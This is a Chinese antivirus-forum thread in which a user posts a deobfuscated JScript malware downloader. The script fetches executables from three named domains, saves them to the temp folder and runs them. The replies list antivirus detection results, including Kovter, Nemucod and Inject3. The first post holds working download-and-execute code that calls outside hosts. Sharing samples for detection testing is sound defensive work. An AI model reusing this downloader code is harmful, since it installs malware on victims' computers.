查看: 2940|回复: 19
收起左侧

[病毒样本] 1 JS 3 EXE

[复制链接]
轩夏
发表于 2016-2-4 11:36:23 | 显示全部楼层 |阅读模式
本帖最后由 轩夏 于 2016-2-4 11:38 编辑

JS


解密后
[mw_shl_code=javascript,true]var b = "geniestation.com www.jfxonline.com tessobrien.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "147701";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i < b.length; i++) {
        var dn = 0;
        try {
            xo.open("GET", "http://" + b + "/counter/?id=" + a4 + "&rnd=920416" + n, false);
            xo.send();
            if (xo.status == 200) {
                xa.open();
                xa.type = 1;
                xa.write(xo.responseBody);
                if (xa.size > 1000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn + n + ".exe", 2);
                    try {
                        ws.Run(fn + n + ".exe", 1, 0);
                    } catch(er) {};
                };
                xa.close();
            };
            if (dn == 1) {
                ld = i;
                break;
            };
        } catch(er) {};
    };
};[/mw_shl_code]


成功下载3个exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
pal家族
发表于 2016-2-4 11:39:23 | 显示全部楼层
Kaspersky
Internet Security
ACCESS DENIED
The requested URL cannot be provided

Object URL:

https://att.kafan.cn/forum.php?mo ... Dk3NTc3MnwxOTYxNzQ1

Reason:

The object is infected by HEUR:Exploit.Script.Generic
Message generated on: 2016/2/4 11:37:44

Kaspersky
Internet Security
ACCESS DENIED
The requested URL cannot be provided

Object URL:

https://att.kafan.cn/forum.php?mo ... Dk3NTc3MnwxOTYxNzQ1

Reason:

The object is infected by Trojan.Win32.Kovter.ddj
Message generated on: 2016/2/4 11:37:54

JS玩年啊(*  ̄3)(ε ̄ *)
多个样本打包还是加个密吧,要不然就得关掉网页反病毒然后再打开。
开开心心卖手机
发表于 2016-2-4 11:44:43 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
windows7爱好者
发表于 2016-2-4 12:03:54 | 显示全部楼层
本帖最后由 windows7爱好者 于 2016-2-4 12:17 编辑

JS两次联网,成功下载一个EXE。DPH击杀
599样本2KB,死的
ab7eaa18f样本试图联网,我允许,我等着看会下载什么东西,等了半天,程序报错退出
d1a6 样本  DPH击杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
欧阳宣
头像被屏蔽
发表于 2016-2-4 12:12:59 | 显示全部楼层
mcafee
JS/Nemucod.bi
icedream89
发表于 2016-2-4 12:56:05 | 显示全部楼层
ess9

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
icedream89
发表于 2016-2-4 12:56:21 | 显示全部楼层
xcvbaby
发表于 2016-2-4 12:57:29 | 显示全部楼层
火绒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
电脑发烧友
发表于 2016-2-4 13:00:30 | 显示全部楼层
威胁名称;"状态";"检测时间";"对象类型";"进程"
特洛伊木马 Inject3.ZPE, c:\Users\wuliao\Desktop\桌面\ab7eaa18f.gif;"已保护";"2016/2/4, 12:57:15";"文件或目录";"c:\Windows\System32\SearchProtocolHost.exe"
特洛伊木马 Inject3.ZPE, c:\Users\wuliao\Desktop\桌面\ab7eaa18f.gif;"已保护";"2016/2/4, 12:57:15";"文件或目录";"c:\Windows\System32\SearchProtocolHost.exe"
特洛伊木马 Inject3.ZNT, c:\Users\wuliao\Desktop\桌面\d1a6.gif;"已保护";"2016/2/4, 12:57:14";"文件或目录";"c:\Windows\System32\SearchProtocolHost.exe"
猥琐大叔
发表于 2016-2-4 13:02:51 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-16 13:12 , Processed in 0.111950 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表